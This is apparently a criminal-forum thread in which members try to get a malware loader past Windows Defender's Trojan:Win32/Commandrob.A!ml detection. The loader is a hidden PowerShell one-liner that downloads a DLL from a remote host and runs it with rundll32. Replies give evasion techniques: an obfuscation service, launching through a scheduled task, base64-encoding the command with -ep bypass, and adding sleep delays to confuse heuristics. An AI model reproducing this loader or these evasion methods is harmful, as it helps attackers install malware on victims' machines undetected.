
Trojan:Win32/Commandrob.A!ml, any ideas for bypassing it?

Matanbuchus
Princeps huius mundi
Premium
Registered: 29.12.2018
Messages: 504
Solutions: 1
Reactions: 160
Deal guarantor: 2
When I run a command of the following form via WIN+R
PowerShell:
powershell -w hidden -c "$f=$env:ProgramData+'\'+[guid]::NewGuid()+'.tmp';iwr 'https://com.com/dll.aspx' -UseBasicParsing -OutFile $f;rundll32.exe `"$f`",DllRegisterServer"
I get a Trojan:Win32/Commandrob.A!ml detection from Windows Defender. Trying to obfuscate the command, for example by splitting rundll32 into parts ('run'+'dll32'), does not help.
Try obfuscating it here: https://argfuscator.net
 
Instead of -w hidden, use a less suspicious execution method. For example, run PowerShell from a scheduled task or a batch file to avoid the blatant "hidden" flag.

Simple concatenation ('run'+'dll32') isn't enough. Use base64 encoding to hide the entire command, then decode and execute it:
PowerShell:
$f = "$env:ProgramData\$([guid]::NewGuid()).tmp"
iwr 'https://com.com/dll.aspx' -UseBasicParsing -OutFile $f
Start-Sleep -Seconds 5 # Delay to confuse heuristics
Start-Process "rundll32.exe" -ArgumentList ""$f",DllRegisterServer" -WindowStyle Hidden
The output might look like: JABmAD0AJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXAAnACsAWwBnAHUAaQBkAF0AOgA6AE4AZQB3AEcAdQBpAGQAKAApACsAJwAuAHQAbQBwACcAOwBpAHcAcgAgACcAaAB0AHQAcABzAD
etc.

Run it:
powershell -ep bypass -enc JABmAD0AJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXAAnACsAWwBnAHUAaQBkAF0AOgA6AE4AZQB3AEcAd
Hi, what is the solution for the Start-Process part of the script? WD kills Start-Process in the script, i.e. starting a file. Obfuscating the script does not help :(